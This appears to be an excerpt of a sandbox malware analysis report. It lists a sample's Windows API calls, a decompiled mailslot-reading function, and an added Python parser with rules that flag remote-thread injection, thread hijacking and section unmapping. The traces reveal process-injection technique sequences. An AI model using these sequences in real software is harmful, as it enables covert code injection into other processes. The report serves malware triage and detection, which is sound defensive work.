  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			/* Decompiled by the sandbox (quality 96%); the comments are editorial.
			 * What the function does: create the mailslot \\.\mailslot\msl0 with a
			 * 0x1000-byte maximum message size and a zero read timeout, then poll it
			 * every 100 ms, appending each full 0x1000-byte chunk to a heap buffer that
			 * grows by 0x1000 per successful read. A short read ends the message.
			 * Returns a Win32 error code (0 = success); on success the buffer pointer is
			 * stored at _a4+4 and the byte count at _a4+8, so _a4 points at a
			 * caller-owned output struct. Slot names follow the decompiler
			 * (_vN = stack slot, _tN = temporary). */
			E00401033(void* _a4) {
				signed int _v8;     /* return value: Win32 error code */
				long _v12;          /* buffer capacity (never initialised in this listing) */
				long _v16;          /* bytes returned by the last ReadFile */
				void* _v20;         /* mailslot handle */
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;         /* heap buffer */
				long _t39;          /* bytes collected so far */
				
				_pop(_t41);         /* decompiler artifact from the prologue; no effect on the logic */
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v20 = _t24;        /* the listing printed _v16 here, but ReadFile and CloseHandle
				                       below take the handle from _v20, so the slot is corrected */
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);    /* RtlAllocateHeap wrapper, see the subcall below */
					if(_t36 == 0) {
						L10:
						_v8 = 8;                 /* ERROR_NOT_ENOUGH_MEMORY */
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {   /* ERROR_SEM_TIMEOUT: no message yet, keep polling */
									_v16 = 0x1000;   /* keeps the loop condition true */
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed   (heap handle read from a global)
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;   /* clear the error code */
									goto L8;
								}
							}
							goto L11;                /* any other ReadFile error ends the loop */
							L8:
							Sleep(0x64); // executed    (100 ms between polls)
						} while (_v16 == 0x1000);    /* a short read terminates the message */
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;                    /* out: buffer pointer */
					 *((intOrPtr*)(_t27 + 8)) = _t39;       /* out: byte count */
				}
				return _v8;
			}


APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
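The per-function "APIs" listings in this report (the mailslot reader decompiled above, the OpenProcess/CreateRemoteThread function and the SuspendThread/VirtualProtectEx/ResumeThread function) are the raw material an analyst mines when triaging a sample. The following is an added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python parser for that bullet layout plus a few behaviour rules over the parsed calls. The regex is an assumption about the report's text format; the sample listings embedded in the block are copied from the function listings on this page; the numeric constants are the Win32 values 0x1F0FFF (PROCESS_ALL_ACCESS) and 0x40 (PAGE_EXECUTE_READWRITE).

```python
"""Tag injection and IPC behaviour from Joe Sandbox per-function API listings.

Editorial example, not part of the sandbox report and not code from the
analysed sample. Assumes the bullet layout of the "APIs" sections in this
report ("• Api.MODULE(args), ref: ADDR", with a "Part of subcall function
XXXX:" prefix for callee APIs); the regex is an assumption about that layout.
"""
import re
from collections import namedtuple

Call = namedtuple("Call", "api module args ref subcall")

_LINE = re.compile(
    r"•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

PROCESS_ALL_ACCESS = 0x1F0FFF      # Win32 access mask seen in OpenProcess above
PAGE_EXECUTE_READWRITE = 0x40      # flNewProtect value seen in VirtualProtect(Ex) above


def parse_calls(text):
    """Turn one function's "APIs" bullet list into Call records (subcall = callee address or None)."""
    calls = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def _hex(arg):
    """Hex argument as int; None for '?' (unresolved by the sandbox) and for string arguments."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def tag_behaviour(calls):
    """Return sorted behaviour tags for one function, using direct and subcall APIs."""
    apis = {c.api for c in calls}
    direct = {c.api for c in calls if c.subcall is None}
    tags = set()
    for c in calls:
        if c.api.startswith("CreateMailslot") and c.args and c.args[0].startswith(r"\\.\mailslot"):
            tags.add("mailslot-ipc:" + c.args[0])
        if c.api == "OpenProcess" and c.args and _hex(c.args[0]) == PROCESS_ALL_ACCESS:
            tags.add("open-process-all-access")
        if c.api in ("VirtualProtect", "VirtualProtectEx"):
            prot = 3 if c.api.endswith("Ex") else 2     # flNewProtect sits one slot later in the Ex form
            if len(c.args) > prot and _hex(c.args[prot]) == PAGE_EXECUTE_READWRITE:
                tags.add("rwx-protect")
    if "CreateRemoteThread" in direct and "open-process-all-access" in tags:
        tags.add("remote-thread-injection")
    if {"SuspendThread", "ResumeThread", "VirtualProtectEx"} <= apis:
        tags.add("suspend-patch-resume")
    if "NtUnmapViewOfSection" in apis:
        tags.add("unmap-view-of-section")
    return sorted(tags)


# Sample listings copied from the function records in this report.
SAMPLE_MAILSLOT = r"""
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
"""
SAMPLE_INJECT = r"""
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
  • CloseHandle.KERNEL32(?), ref: 01B324E0
"""
SAMPLE_HIJACK = r"""
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
"""

if __name__ == "__main__":
    for name, text in (("mailslot", SAMPLE_MAILSLOT), ("inject", SAMPLE_INJECT), ("hijack", SAMPLE_HIJACK)):
        print(name, tag_behaviour(parse_calls(text)))
```

The rules deliberately need more than one API to fire: `remote-thread-injection` requires a direct `CreateRemoteThread` in the same function as an `OpenProcess` with the all-access mask, and `suspend-patch-resume` requires `SuspendThread`, `ResumeThread` and `VirtualProtectEx` together, so the second sample (which has the suspend/resume pair only through a subcall, without the protection change) is tagged as injection but not as a thread patch. Subcall lines are kept in the parse so that a caller's tags reflect what its callees do, which is how the report itself presents them.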
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
